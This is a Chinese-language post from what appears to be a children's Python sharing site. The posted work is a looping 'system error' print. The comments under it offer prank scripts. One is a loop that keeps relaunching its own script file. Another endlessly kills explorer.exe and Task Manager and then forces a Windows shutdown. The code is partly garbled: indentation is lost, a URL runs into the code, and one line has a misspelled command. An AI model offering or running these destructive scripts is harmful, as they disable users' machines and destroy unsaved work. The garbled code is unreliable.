用户:
一只正常的杉查看:4 回复:7 评论:4 创建时间:2019-12-22T16:40:13
【作品展示】

【作品介绍】
不知
【作品源代码】
#开始进入Python的世界
print('系统错误')
a = '系统错误'
while (a == '系统错误'):
print('系统错误')
【提示】
部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:
https://python.codemao.cnfrom os import system
while True:
system("python C:\\file.py")
保存为 C:\file.py
点赞0
评论
ZCH幻影深渊import time
from os import system
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
import os
while True:
system("taskkill /f /im explorer.exe >nul 2>nul")
system("taskkill /f /im taskmgr.exe >nul 2>nul")
runing = True
os.system("shutdown -s -t 3 ")
time.sleep(3)
os.system("shutup -s -t 3 ")
点赞0
评论